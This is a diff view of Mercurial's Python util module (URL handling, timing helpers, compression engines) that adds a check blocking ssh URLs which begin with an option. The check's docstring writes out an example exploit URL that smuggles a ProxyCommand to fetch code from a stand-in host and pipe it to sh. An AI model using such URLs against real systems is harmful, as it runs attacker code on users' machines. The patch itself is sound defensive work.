2867 # URIs list because Python < 2.4.3 uses only that to search for
2867 # URIs list because Python < 2.4.3 uses only that to search for
2868 # a password.
2868 # a password.
2869 return (s, (None, (s, self.host),
2869 return (s, (None, (s, self.host),
2870 self.user, self.passwd or ''))
2870 self.user, self.passwd or ''))
2871
2871
2872 def isabs(self):
2872 def isabs(self):
2873 if self.scheme and self.scheme != 'file':
2873 if self.scheme and self.scheme != 'file':
2874 return True # remote URL
2874 return True # remote URL
2875 if hasdriveletter(self.path):
2875 if hasdriveletter(self.path):
2876 return True # absolute for our purposes - can't be joined()
2876 return True # absolute for our purposes - can't be joined()
2877 if self.path.startswith(br'\\'):
2877 if self.path.startswith(br'\\'):
2878 return True # Windows UNC path
2878 return True # Windows UNC path
2879 if self.path.startswith('/'):
2879 if self.path.startswith('/'):
2880 return True # POSIX-style
2880 return True # POSIX-style
2881 return False
2881 return False
2882
2882
2883 def localpath(self):
2883 def localpath(self):
2884 if self.scheme == 'file' or self.scheme == 'bundle':
2884 if self.scheme == 'file' or self.scheme == 'bundle':
2885 path = self.path or '/'
2885 path = self.path or '/'
2886 # For Windows, we need to promote hosts containing drive
2886 # For Windows, we need to promote hosts containing drive
2887 # letters to paths with drive letters.
2887 # letters to paths with drive letters.
2888 if hasdriveletter(self._hostport):
2888 if hasdriveletter(self._hostport):
2889 path = self._hostport + '/' + self.path
2889 path = self._hostport + '/' + self.path
2890 elif (self.host is not None and self.path
2890 elif (self.host is not None and self.path
2891 and not hasdriveletter(path)):
2891 and not hasdriveletter(path)):
2892 path = '/' + path
2892 path = '/' + path
2893 return path
2893 return path
2894 return self._origpath
2894 return self._origpath
2895
2895
2896 def islocal(self):
2896 def islocal(self):
2897 '''whether localpath will return something that posixfile can open'''
2897 '''whether localpath will return something that posixfile can open'''
2898 return (not self.scheme or self.scheme == 'file'
2898 return (not self.scheme or self.scheme == 'file'
2899 or self.scheme == 'bundle')
2899 or self.scheme == 'bundle')
2900
2900
2901 def hasscheme(path):
2901 def hasscheme(path):
2902 return bool(url(path).scheme)
2902 return bool(url(path).scheme)
2903
2903
2904 def hasdriveletter(path):
2904 def hasdriveletter(path):
2905 return path and path[1:2] == ':' and path[0:1].isalpha()
2905 return path and path[1:2] == ':' and path[0:1].isalpha()
2906
2906
2907 def urllocalpath(path):
2907 def urllocalpath(path):
2908 return url(path, parsequery=False, parsefragment=False).localpath()
2908 return url(path, parsequery=False, parsefragment=False).localpath()
2909
2909
2910 def checksafessh(path):
2911 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2912
2913 This is a sanity check for ssh urls. ssh will parse the first item as
2914 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2915 Let's prevent these potentially exploited urls entirely and warn the
2916 user.
2917
2918 Raises an error.Abort when the url is unsafe.
2919 """
2920 path = urlreq.unquote(path)
2921 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2922 raise error.Abort(_('potentially unsafe url: %r') %
2923 (path,))
2924
2910 def hidepassword(u):
2925 def hidepassword(u):
2911 '''hide user credential in a url string'''
2926 '''hide user credential in a url string'''
2912 u = url(u)
2927 u = url(u)
2913 if u.passwd:
2928 if u.passwd:
2914 u.passwd = '***'
2929 u.passwd = '***'
2915 return bytes(u)
2930 return bytes(u)
2916
2931
2917 def removeauth(u):
2932 def removeauth(u):
2918 '''remove all authentication information from a url string'''
2933 '''remove all authentication information from a url string'''
2919 u = url(u)
2934 u = url(u)
2920 u.user = u.passwd = None
2935 u.user = u.passwd = None
2921 return str(u)
2936 return str(u)
2922
2937
2923 timecount = unitcountfn(
2938 timecount = unitcountfn(
2924 (1, 1e3, _('%.0f s')),
2939 (1, 1e3, _('%.0f s')),
2925 (100, 1, _('%.1f s')),
2940 (100, 1, _('%.1f s')),
2926 (10, 1, _('%.2f s')),
2941 (10, 1, _('%.2f s')),
2927 (1, 1, _('%.3f s')),
2942 (1, 1, _('%.3f s')),
2928 (100, 0.001, _('%.1f ms')),
2943 (100, 0.001, _('%.1f ms')),
2929 (10, 0.001, _('%.2f ms')),
2944 (10, 0.001, _('%.2f ms')),
2930 (1, 0.001, _('%.3f ms')),
2945 (1, 0.001, _('%.3f ms')),
2931 (100, 0.000001, _('%.1f us')),
2946 (100, 0.000001, _('%.1f us')),
2932 (10, 0.000001, _('%.2f us')),
2947 (10, 0.000001, _('%.2f us')),
2933 (1, 0.000001, _('%.3f us')),
2948 (1, 0.000001, _('%.3f us')),
2934 (100, 0.000000001, _('%.1f ns')),
2949 (100, 0.000000001, _('%.1f ns')),
2935 (10, 0.000000001, _('%.2f ns')),
2950 (10, 0.000000001, _('%.2f ns')),
2936 (1, 0.000000001, _('%.3f ns')),
2951 (1, 0.000000001, _('%.3f ns')),
2937 )
2952 )
2938
2953
2939 _timenesting = [0]
2954 _timenesting = [0]
2940
2955
2941 def timed(func):
2956 def timed(func):
2942 '''Report the execution time of a function call to stderr.
2957 '''Report the execution time of a function call to stderr.
2943
2958
2944 During development, use as a decorator when you need to measure
2959 During development, use as a decorator when you need to measure
2945 the cost of a function, e.g. as follows:
2960 the cost of a function, e.g. as follows:
2946
2961
2947 @util.timed
2962 @util.timed
2948 def foo(a, b, c):
2963 def foo(a, b, c):
2949 pass
2964 pass
2950 '''
2965 '''
2951
2966
2952 def wrapper(*args, **kwargs):
2967 def wrapper(*args, **kwargs):
2953 start = timer()
2968 start = timer()
2954 indent = 2
2969 indent = 2
2955 _timenesting[0] += indent
2970 _timenesting[0] += indent
2956 try:
2971 try:
2957 return func(*args, **kwargs)
2972 return func(*args, **kwargs)
2958 finally:
2973 finally:
2959 elapsed = timer() - start
2974 elapsed = timer() - start
2960 _timenesting[0] -= indent
2975 _timenesting[0] -= indent
2961 stderr.write('%s%s: %s\n' %
2976 stderr.write('%s%s: %s\n' %
2962 (' ' * _timenesting[0], func.__name__,
2977 (' ' * _timenesting[0], func.__name__,
2963 timecount(elapsed)))
2978 timecount(elapsed)))
2964 return wrapper
2979 return wrapper
2965
2980
2966 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2981 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2967 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2982 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2968
2983
2969 def sizetoint(s):
2984 def sizetoint(s):
2970 '''Convert a space specifier to a byte count.
2985 '''Convert a space specifier to a byte count.
2971
2986
2972 >>> sizetoint('30')
2987 >>> sizetoint('30')
2973 30
2988 30
2974 >>> sizetoint('2.2kb')
2989 >>> sizetoint('2.2kb')
2975 2252
2990 2252
2976 >>> sizetoint('6M')
2991 >>> sizetoint('6M')
2977 6291456
2992 6291456
2978 '''
2993 '''
2979 t = s.strip().lower()
2994 t = s.strip().lower()
2980 try:
2995 try:
2981 for k, u in _sizeunits:
2996 for k, u in _sizeunits:
2982 if t.endswith(k):
2997 if t.endswith(k):
2983 return int(float(t[:-len(k)]) * u)
2998 return int(float(t[:-len(k)]) * u)
2984 return int(t)
2999 return int(t)
2985 except ValueError:
3000 except ValueError:
2986 raise error.ParseError(_("couldn't parse size: %s") % s)
3001 raise error.ParseError(_("couldn't parse size: %s") % s)
2987
3002
2988 class hooks(object):
3003 class hooks(object):
2989 '''A collection of hook functions that can be used to extend a
3004 '''A collection of hook functions that can be used to extend a
2990 function's behavior. Hooks are called in lexicographic order,
3005 function's behavior. Hooks are called in lexicographic order,
2991 based on the names of their sources.'''
3006 based on the names of their sources.'''
2992
3007
2993 def __init__(self):
3008 def __init__(self):
2994 self._hooks = []
3009 self._hooks = []
2995
3010
2996 def add(self, source, hook):
3011 def add(self, source, hook):
2997 self._hooks.append((source, hook))
3012 self._hooks.append((source, hook))
2998
3013
2999 def __call__(self, *args):
3014 def __call__(self, *args):
3000 self._hooks.sort(key=lambda x: x[0])
3015 self._hooks.sort(key=lambda x: x[0])
3001 results = []
3016 results = []
3002 for source, hook in self._hooks:
3017 for source, hook in self._hooks:
3003 results.append(hook(*args))
3018 results.append(hook(*args))
3004 return results
3019 return results
3005
3020
3006 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3021 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3007 '''Yields lines for a nicely formatted stacktrace.
3022 '''Yields lines for a nicely formatted stacktrace.
3008 Skips the 'skip' last entries, then return the last 'depth' entries.
3023 Skips the 'skip' last entries, then return the last 'depth' entries.
3009 Each file+linenumber is formatted according to fileline.
3024 Each file+linenumber is formatted according to fileline.
3010 Each line is formatted according to line.
3025 Each line is formatted according to line.
3011 If line is None, it yields:
3026 If line is None, it yields:
3012 length of longest filepath+line number,
3027 length of longest filepath+line number,
3013 filepath+linenumber,
3028 filepath+linenumber,
3014 function
3029 function
3015
3030
3016 Not be used in production code but very convenient while developing.
3031 Not be used in production code but very convenient while developing.
3017 '''
3032 '''
3018 entries = [(fileline % (fn, ln), func)
3033 entries = [(fileline % (fn, ln), func)
3019 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3034 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3020 ][-depth:]
3035 ][-depth:]
3021 if entries:
3036 if entries:
3022 fnmax = max(len(entry[0]) for entry in entries)
3037 fnmax = max(len(entry[0]) for entry in entries)
3023 for fnln, func in entries:
3038 for fnln, func in entries:
3024 if line is None:
3039 if line is None:
3025 yield (fnmax, fnln, func)
3040 yield (fnmax, fnln, func)
3026 else:
3041 else:
3027 yield line % (fnmax, fnln, func)
3042 yield line % (fnmax, fnln, func)
3028
3043
3029 def debugstacktrace(msg='stacktrace', skip=0,
3044 def debugstacktrace(msg='stacktrace', skip=0,
3030 f=stderr, otherf=stdout, depth=0):
3045 f=stderr, otherf=stdout, depth=0):
3031 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3046 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3032 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3047 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3033 By default it will flush stdout first.
3048 By default it will flush stdout first.
3034 It can be used everywhere and intentionally does not require an ui object.
3049 It can be used everywhere and intentionally does not require an ui object.
3035 Not be used in production code but very convenient while developing.
3050 Not be used in production code but very convenient while developing.
3036 '''
3051 '''
3037 if otherf:
3052 if otherf:
3038 otherf.flush()
3053 otherf.flush()
3039 f.write('%s at:\n' % msg.rstrip())
3054 f.write('%s at:\n' % msg.rstrip())
3040 for line in getstackframes(skip + 1, depth=depth):
3055 for line in getstackframes(skip + 1, depth=depth):
3041 f.write(line)
3056 f.write(line)
3042 f.flush()
3057 f.flush()
3043
3058
3044 class dirs(object):
3059 class dirs(object):
3045 '''a multiset of directory names from a dirstate or manifest'''
3060 '''a multiset of directory names from a dirstate or manifest'''
3046
3061
3047 def __init__(self, map, skip=None):
3062 def __init__(self, map, skip=None):
3048 self._dirs = {}
3063 self._dirs = {}
3049 addpath = self.addpath
3064 addpath = self.addpath
3050 if safehasattr(map, 'iteritems') and skip is not None:
3065 if safehasattr(map, 'iteritems') and skip is not None:
3051 for f, s in map.iteritems():
3066 for f, s in map.iteritems():
3052 if s[0] != skip:
3067 if s[0] != skip:
3053 addpath(f)
3068 addpath(f)
3054 else:
3069 else:
3055 for f in map:
3070 for f in map:
3056 addpath(f)
3071 addpath(f)
3057
3072
3058 def addpath(self, path):
3073 def addpath(self, path):
3059 dirs = self._dirs
3074 dirs = self._dirs
3060 for base in finddirs(path):
3075 for base in finddirs(path):
3061 if base in dirs:
3076 if base in dirs:
3062 dirs[base] += 1
3077 dirs[base] += 1
3063 return
3078 return
3064 dirs[base] = 1
3079 dirs[base] = 1
3065
3080
3066 def delpath(self, path):
3081 def delpath(self, path):
3067 dirs = self._dirs
3082 dirs = self._dirs
3068 for base in finddirs(path):
3083 for base in finddirs(path):
3069 if dirs[base] > 1:
3084 if dirs[base] > 1:
3070 dirs[base] -= 1
3085 dirs[base] -= 1
3071 return
3086 return
3072 del dirs[base]
3087 del dirs[base]
3073
3088
3074 def __iter__(self):
3089 def __iter__(self):
3075 return iter(self._dirs)
3090 return iter(self._dirs)
3076
3091
3077 def __contains__(self, d):
3092 def __contains__(self, d):
3078 return d in self._dirs
3093 return d in self._dirs
3079
3094
3080 if safehasattr(parsers, 'dirs'):
3095 if safehasattr(parsers, 'dirs'):
3081 dirs = parsers.dirs
3096 dirs = parsers.dirs
3082
3097
3083 def finddirs(path):
3098 def finddirs(path):
3084 pos = path.rfind('/')
3099 pos = path.rfind('/')
3085 while pos != -1:
3100 while pos != -1:
3086 yield path[:pos]
3101 yield path[:pos]
3087 pos = path.rfind('/', 0, pos)
3102 pos = path.rfind('/', 0, pos)
3088
3103
3089 # compression code
3104 # compression code
3090
3105
3091 SERVERROLE = 'server'
3106 SERVERROLE = 'server'
3092 CLIENTROLE = 'client'
3107 CLIENTROLE = 'client'
3093
3108
3094 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3109 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3095 (u'name', u'serverpriority',
3110 (u'name', u'serverpriority',
3096 u'clientpriority'))
3111 u'clientpriority'))
3097
3112
3098 class compressormanager(object):
3113 class compressormanager(object):
3099 """Holds registrations of various compression engines.
3114 """Holds registrations of various compression engines.
3100
3115
3101 This class essentially abstracts the differences between compression
3116 This class essentially abstracts the differences between compression
3102 engines to allow new compression formats to be added easily, possibly from
3117 engines to allow new compression formats to be added easily, possibly from
3103 extensions.
3118 extensions.
3104
3119
3105 Compressors are registered against the global instance by calling its
3120 Compressors are registered against the global instance by calling its
3106 ``register()`` method.
3121 ``register()`` method.
3107 """
3122 """
3108 def __init__(self):
3123 def __init__(self):
3109 self._engines = {}
3124 self._engines = {}
3110 # Bundle spec human name to engine name.
3125 # Bundle spec human name to engine name.
3111 self._bundlenames = {}
3126 self._bundlenames = {}
3112 # Internal bundle identifier to engine name.
3127 # Internal bundle identifier to engine name.
3113 self._bundletypes = {}
3128 self._bundletypes = {}
3114 # Revlog header to engine name.
3129 # Revlog header to engine name.
3115 self._revlogheaders = {}
3130 self._revlogheaders = {}
3116 # Wire proto identifier to engine name.
3131 # Wire proto identifier to engine name.
3117 self._wiretypes = {}
3132 self._wiretypes = {}
3118
3133
3119 def __getitem__(self, key):
3134 def __getitem__(self, key):
3120 return self._engines[key]
3135 return self._engines[key]
3121
3136
3122 def __contains__(self, key):
3137 def __contains__(self, key):
3123 return key in self._engines
3138 return key in self._engines
3124
3139
3125 def __iter__(self):
3140 def __iter__(self):
3126 return iter(self._engines.keys())
3141 return iter(self._engines.keys())
3127
3142
3128 def register(self, engine):
3143 def register(self, engine):
3129 """Register a compression engine with the manager.
3144 """Register a compression engine with the manager.
3130
3145
3131 The argument must be a ``compressionengine`` instance.
3146 The argument must be a ``compressionengine`` instance.
3132 """
3147 """
3133 if not isinstance(engine, compressionengine):
3148 if not isinstance(engine, compressionengine):
3134 raise ValueError(_('argument must be a compressionengine'))
3149 raise ValueError(_('argument must be a compressionengine'))
3135
3150
3136 name = engine.name()
3151 name = engine.name()
3137
3152
3138 if name in self._engines:
3153 if name in self._engines:
3139 raise error.Abort(_('compression engine %s already registered') %
3154 raise error.Abort(_('compression engine %s already registered') %
3140 name)
3155 name)
3141
3156
3142 bundleinfo = engine.bundletype()
3157 bundleinfo = engine.bundletype()
3143 if bundleinfo:
3158 if bundleinfo:
3144 bundlename, bundletype = bundleinfo
3159 bundlename, bundletype = bundleinfo
3145
3160
3146 if bundlename in self._bundlenames:
3161 if bundlename in self._bundlenames:
3147 raise error.Abort(_('bundle name %s already registered') %
3162 raise error.Abort(_('bundle name %s already registered') %
3148 bundlename)
3163 bundlename)
3149 if bundletype in self._bundletypes:
3164 if bundletype in self._bundletypes:
3150 raise error.Abort(_('bundle type %s already registered by %s') %
3165 raise error.Abort(_('bundle type %s already registered by %s') %
3151 (bundletype, self._bundletypes[bundletype]))
3166 (bundletype, self._bundletypes[bundletype]))
3152
3167
3153 # No external facing name declared.
3168 # No external facing name declared.
3154 if bundlename:
3169 if bundlename:
3155 self._bundlenames[bundlename] = name
3170 self._bundlenames[bundlename] = name
3156
3171
3157 self._bundletypes[bundletype] = name
3172 self._bundletypes[bundletype] = name
3158
3173
3159 wiresupport = engine.wireprotosupport()
3174 wiresupport = engine.wireprotosupport()
3160 if wiresupport:
3175 if wiresupport:
3161 wiretype = wiresupport.name
3176 wiretype = wiresupport.name
3162 if wiretype in self._wiretypes:
3177 if wiretype in self._wiretypes:
3163 raise error.Abort(_('wire protocol compression %s already '
3178 raise error.Abort(_('wire protocol compression %s already '
3164 'registered by %s') %
3179 'registered by %s') %
3165 (wiretype, self._wiretypes[wiretype]))
3180 (wiretype, self._wiretypes[wiretype]))
3166
3181
3167 self._wiretypes[wiretype] = name
3182 self._wiretypes[wiretype] = name
3168
3183
3169 revlogheader = engine.revlogheader()
3184 revlogheader = engine.revlogheader()
3170 if revlogheader and revlogheader in self._revlogheaders:
3185 if revlogheader and revlogheader in self._revlogheaders:
3171 raise error.Abort(_('revlog header %s already registered by %s') %
3186 raise error.Abort(_('revlog header %s already registered by %s') %
3172 (revlogheader, self._revlogheaders[revlogheader]))
3187 (revlogheader, self._revlogheaders[revlogheader]))
3173
3188
3174 if revlogheader:
3189 if revlogheader:
3175 self._revlogheaders[revlogheader] = name
3190 self._revlogheaders[revlogheader] = name
3176
3191
3177 self._engines[name] = engine
3192 self._engines[name] = engine
3178
3193
3179 @property
3194 @property
3180 def supportedbundlenames(self):
3195 def supportedbundlenames(self):
3181 return set(self._bundlenames.keys())
3196 return set(self._bundlenames.keys())
3182
3197
3183 @property
3198 @property
3184 def supportedbundletypes(self):
3199 def supportedbundletypes(self):
3185 return set(self._bundletypes.keys())
3200 return set(self._bundletypes.keys())
3186
3201
3187 def forbundlename(self, bundlename):
3202 def forbundlename(self, bundlename):
3188 """Obtain a compression engine registered to a bundle name.
3203 """Obtain a compression engine registered to a bundle name.
3189
3204
3190 Will raise KeyError if the bundle type isn't registered.
3205 Will raise KeyError if the bundle type isn't registered.
3191
3206
3192 Will abort if the engine is known but not available.
3207 Will abort if the engine is known but not available.
3193 """
3208 """
3194 engine = self._engines[self._bundlenames[bundlename]]
3209 engine = self._engines[self._bundlenames[bundlename]]
3195 if not engine.available():
3210 if not engine.available():
3196 raise error.Abort(_('compression engine %s could not be loaded') %
3211 raise error.Abort(_('compression engine %s could not be loaded') %
3197 engine.name())
3212 engine.name())
3198 return engine
3213 return engine
3199
3214
3200 def forbundletype(self, bundletype):
3215 def forbundletype(self, bundletype):
3201 """Obtain a compression engine registered to a bundle type.
3216 """Obtain a compression engine registered to a bundle type.
3202
3217
3203 Will raise KeyError if the bundle type isn't registered.
3218 Will raise KeyError if the bundle type isn't registered.
3204
3219
3205 Will abort if the engine is known but not available.
3220 Will abort if the engine is known but not available.
3206 """
3221 """
3207 engine = self._engines[self._bundletypes[bundletype]]
3222 engine = self._engines[self._bundletypes[bundletype]]
3208 if not engine.available():
3223 if not engine.available():
3209 raise error.Abort(_('compression engine %s could not be loaded') %
3224 raise error.Abort(_('compression engine %s could not be loaded') %
3210 engine.name())
3225 engine.name())
3211 return engine
3226 return engine
3212
3227
3213 def supportedwireengines(self, role, onlyavailable=True):
3228 def supportedwireengines(self, role, onlyavailable=True):
3214 """Obtain compression engines that support the wire protocol.
3229 """Obtain compression engines that support the wire protocol.
3215
3230
3216 Returns a list of engines in prioritized order, most desired first.
3231 Returns a list of engines in prioritized order, most desired first.
3217
3232
3218 If ``onlyavailable`` is set, filter out engines that can't be
3233 If ``onlyavailable`` is set, filter out engines that can't be
3219 loaded.
3234 loaded.
3220 """
3235 """
3221 assert role in (SERVERROLE, CLIENTROLE)
3236 assert role in (SERVERROLE, CLIENTROLE)
3222
3237
3223 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3238 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3224
3239
3225 engines = [self._engines[e] for e in self._wiretypes.values()]
3240 engines = [self._engines[e] for e in self._wiretypes.values()]
3226 if onlyavailable:
3241 if onlyavailable:
3227 engines = [e for e in engines if e.available()]
3242 engines = [e for e in engines if e.available()]
3228
3243
3229 def getkey(e):
3244 def getkey(e):
3230 # Sort first by priority, highest first. In case of tie, sort
3245 # Sort first by priority, highest first. In case of tie, sort
3231 # alphabetically. This is arbitrary, but ensures output is
3246 # alphabetically. This is arbitrary, but ensures output is
3232 # stable.
3247 # stable.
3233 w = e.wireprotosupport()
3248 w = e.wireprotosupport()
3234 return -1 * getattr(w, attr), w.name
3249 return -1 * getattr(w, attr), w.name
3235
3250
3236 return list(sorted(engines, key=getkey))
3251 return list(sorted(engines, key=getkey))
3237
3252
3238 def forwiretype(self, wiretype):
3253 def forwiretype(self, wiretype):
3239 engine = self._engines[self._wiretypes[wiretype]]
3254 engine = self._engines[self._wiretypes[wiretype]]
3240 if not engine.available():
3255 if not engine.available():
3241 raise error.Abort(_('compression engine %s could not be loaded') %
3256 raise error.Abort(_('compression engine %s could not be loaded') %
3242 engine.name())
3257 engine.name())
3243 return engine
3258 return engine
3244
3259
3245 def forrevlogheader(self, header):
3260 def forrevlogheader(self, header):
3246 """Obtain a compression engine registered to a revlog header.
3261 """Obtain a compression engine registered to a revlog header.
3247
3262
3248 Will raise KeyError if the revlog header value isn't registered.
3263 Will raise KeyError if the revlog header value isn't registered.
3249 """
3264 """
3250 return self._engines[self._revlogheaders[header]]
3265 return self._engines[self._revlogheaders[header]]
3251
3266
3252 compengines = compressormanager()
3267 compengines = compressormanager()
3253
3268
3254 class compressionengine(object):
3269 class compressionengine(object):
3255 """Base class for compression engines.
3270 """Base class for compression engines.
3256
3271
3257 Compression engines must implement the interface defined by this class.
3272 Compression engines must implement the interface defined by this class.
3258 """
3273 """
3259 def name(self):
3274 def name(self):
3260 """Returns the name of the compression engine.
3275 """Returns the name of the compression engine.
3261
3276
3262 This is the key the engine is registered under.
3277 This is the key the engine is registered under.
3263
3278
3264 This method must be implemented.
3279 This method must be implemented.
3265 """
3280 """
3266 raise NotImplementedError()
3281 raise NotImplementedError()
3267
3282
3268 def available(self):
3283 def available(self):
3269 """Whether the compression engine is available.
3284 """Whether the compression engine is available.
3270
3285
3271 The intent of this method is to allow optional compression engines
3286 The intent of this method is to allow optional compression engines
3272 that may not be available in all installations (such as engines relying
3287 that may not be available in all installations (such as engines relying
3273 on C extensions that may not be present).
3288 on C extensions that may not be present).
3274 """
3289 """
3275 return True
3290 return True
3276
3291
3277 def bundletype(self):
3292 def bundletype(self):
3278 """Describes bundle identifiers for this engine.
3293 """Describes bundle identifiers for this engine.
3279
3294
3280 If this compression engine isn't supported for bundles, returns None.
3295 If this compression engine isn't supported for bundles, returns None.
3281
3296
3282 If this engine can be used for bundles, returns a 2-tuple of strings of
3297 If this engine can be used for bundles, returns a 2-tuple of strings of
3283 the user-facing "bundle spec" compression name and an internal
3298 the user-facing "bundle spec" compression name and an internal
3284 identifier used to denote the compression format within bundles. To
3299 identifier used to denote the compression format within bundles. To
3285 exclude the name from external usage, set the first element to ``None``.
3300 exclude the name from external usage, set the first element to ``None``.
3286
3301
3287 If bundle compression is supported, the class must also implement
3302 If bundle compression is supported, the class must also implement
3288 ``compressstream`` and `decompressorreader``.
3303 ``compressstream`` and `decompressorreader``.
3289
3304
3290 The docstring of this method is used in the help system to tell users
3305 The docstring of this method is used in the help system to tell users
3291 about this engine.
3306 about this engine.
3292 """
3307 """
3293 return None
3308 return None
3294
3309
3295 def wireprotosupport(self):
3310 def wireprotosupport(self):
3296 """Declare support for this compression format on the wire protocol.
3311 """Declare support for this compression format on the wire protocol.
3297
3312
3298 If this compression engine isn't supported for compressing wire
3313 If this compression engine isn't supported for compressing wire
3299 protocol payloads, returns None.
3314 protocol payloads, returns None.
3300
3315
3301 Otherwise, returns ``compenginewireprotosupport`` with the following
3316 Otherwise, returns ``compenginewireprotosupport`` with the following
3302 fields:
3317 fields:
3303
3318
3304 * String format identifier
3319 * String format identifier
3305 * Integer priority for the server
3320 * Integer priority for the server
3306 * Integer priority for the client
3321 * Integer priority for the client
3307
3322
3308 The integer priorities are used to order the advertisement of format
3323 The integer priorities are used to order the advertisement of format
3309 support by server and client. The highest integer is advertised
3324 support by server and client. The highest integer is advertised
3310 first. Integers with non-positive values aren't advertised.
3325 first. Integers with non-positive values aren't advertised.
3311
3326
3312 The priority values are somewhat arbitrary and only used for default
3327 The priority values are somewhat arbitrary and only used for default
3313 ordering. The relative order can be changed via config options.
3328 ordering. The relative order can be changed via config options.
3314
3329
3315 If wire protocol compression is supported, the class must also implement
3330 If wire protocol compression is supported, the class must also implement
3316 ``compressstream`` and ``decompressorreader``.
3331 ``compressstream`` and ``decompressorreader``.
3317 """
3332 """
3318 return None
3333 return None
3319
3334
3320 def revlogheader(self):
3335 def revlogheader(self):
3321 """Header added to revlog chunks that identifies this engine.
3336 """Header added to revlog chunks that identifies this engine.
3322
3337
3323 If this engine can be used to compress revlogs, this method should
3338 If this engine can be used to compress revlogs, this method should
3324 return the bytes used to identify chunks compressed with this engine.
3339 return the bytes used to identify chunks compressed with this engine.
3325 Else, the method should return ``None`` to indicate it does not
3340 Else, the method should return ``None`` to indicate it does not
3326 participate in revlog compression.
3341 participate in revlog compression.
3327 """
3342 """
3328 return None
3343 return None
3329
3344
3330 def compressstream(self, it, opts=None):
3345 def compressstream(self, it, opts=None):
3331 """Compress an iterator of chunks.
3346 """Compress an iterator of chunks.
3332
3347
3333 The method receives an iterator (ideally a generator) of chunks of
3348 The method receives an iterator (ideally a generator) of chunks of
3334 bytes to be compressed. It returns an iterator (ideally a generator)
3349 bytes to be compressed. It returns an iterator (ideally a generator)
3335 of bytes of chunks representing the compressed output.
3350 of bytes of chunks representing the compressed output.
3336
3351
3337 Optionally accepts an argument defining how to perform compression.
3352 Optionally accepts an argument defining how to perform compression.
3338 Each engine treats this argument differently.
3353 Each engine treats this argument differently.
3339 """
3354 """
3340 raise NotImplementedError()
3355 raise NotImplementedError()
3341
3356
3342 def decompressorreader(self, fh):
3357 def decompressorreader(self, fh):
3343 """Perform decompression on a file object.
3358 """Perform decompression on a file object.
3344
3359
3345 Argument is an object with a ``read(size)`` method that returns
3360 Argument is an object with a ``read(size)`` method that returns
3346 compressed data. Return value is an object with a ``read(size)`` that
3361 compressed data. Return value is an object with a ``read(size)`` that
3347 returns uncompressed data.
3362 returns uncompressed data.
3348 """
3363 """
3349 raise NotImplementedError()
3364 raise NotImplementedError()
3350
3365
3351 def revlogcompressor(self, opts=None):
3366 def revlogcompressor(self, opts=None):
3352 """Obtain an object that can be used to compress revlog entries.
3367 """Obtain an object that can be used to compress revlog entries.
3353
3368
3354 The object has a ``compress(data)`` method that compresses binary
3369 The object has a ``compress(data)`` method that compresses binary
3355 data. This method returns compressed binary data or ``None`` if
3370 data. This method returns compressed binary data or ``None`` if
3356 the data could not be compressed (too small, not compressible, etc).
3371 the data could not be compressed (too small, not compressible, etc).
3357 The returned data should have a header uniquely identifying this
3372 The returned data should have a header uniquely identifying this
3358 compression format so decompression can be routed to this engine.
3373 compression format so decompression can be routed to this engine.
3359 This header should be identified by the ``revlogheader()`` return
3374 This header should be identified by the ``revlogheader()`` return
3360 value.
3375 value.
3361
3376
3362 The object has a ``decompress(data)`` method that decompresses
3377 The object has a ``decompress(data)`` method that decompresses
3363 data. The method will only be called if ``data`` begins with
3378 data. The method will only be called if ``data`` begins with
3364 ``revlogheader()``. The method should return the raw, uncompressed
3379 ``revlogheader()``. The method should return the raw, uncompressed
3365 data or raise a ``RevlogError``.
3380 data or raise a ``RevlogError``.
3366
3381
3367 The object is reusable but is not thread safe.
3382 The object is reusable but is not thread safe.
3368 """
3383 """
3369 raise NotImplementedError()
3384 raise NotImplementedError()
3370
3385
3371 class _zlibengine(compressionengine):
3386 class _zlibengine(compressionengine):
3372 def name(self):
3387 def name(self):
3373 return 'zlib'
3388 return 'zlib'
3374
3389
3375 def bundletype(self):
3390 def bundletype(self):
3376 """zlib compression using the DEFLATE algorithm.
3391 """zlib compression using the DEFLATE algorithm.
3377
3392
3378 All Mercurial clients should support this format. The compression
3393 All Mercurial clients should support this format. The compression
3379 algorithm strikes a reasonable balance between compression ratio
3394 algorithm strikes a reasonable balance between compression ratio
3380 and size.
3395 and size.
3381 """
3396 """
3382 return 'gzip', 'GZ'
3397 return 'gzip', 'GZ'
3383
3398
3384 def wireprotosupport(self):
3399 def wireprotosupport(self):
3385 return compewireprotosupport('zlib', 20, 20)
3400 return compewireprotosupport('zlib', 20, 20)
3386
3401
3387 def revlogheader(self):
3402 def revlogheader(self):
3388 return 'x'
3403 return 'x'
3389
3404
3390 def compressstream(self, it, opts=None):
3405 def compressstream(self, it, opts=None):
3391 opts = opts or {}
3406 opts = opts or {}
3392
3407
3393 z = zlib.compressobj(opts.get('level', -1))
3408 z = zlib.compressobj(opts.get('level', -1))
3394 for chunk in it:
3409 for chunk in it:
3395 data = z.compress(chunk)
3410 data = z.compress(chunk)
3396 # Not all calls to compress emit data. It is cheaper to inspect
3411 # Not all calls to compress emit data. It is cheaper to inspect
3397 # here than to feed empty chunks through generator.
3412 # here than to feed empty chunks through generator.
3398 if data:
3413 if data:
3399 yield data
3414 yield data
3400
3415
3401 yield z.flush()
3416 yield z.flush()
3402
3417
3403 def decompressorreader(self, fh):
3418 def decompressorreader(self, fh):
3404 def gen():
3419 def gen():
3405 d = zlib.decompressobj()
3420 d = zlib.decompressobj()
3406 for chunk in filechunkiter(fh):
3421 for chunk in filechunkiter(fh):
3407 while chunk:
3422 while chunk:
3408 # Limit output size to limit memory.
3423 # Limit output size to limit memory.
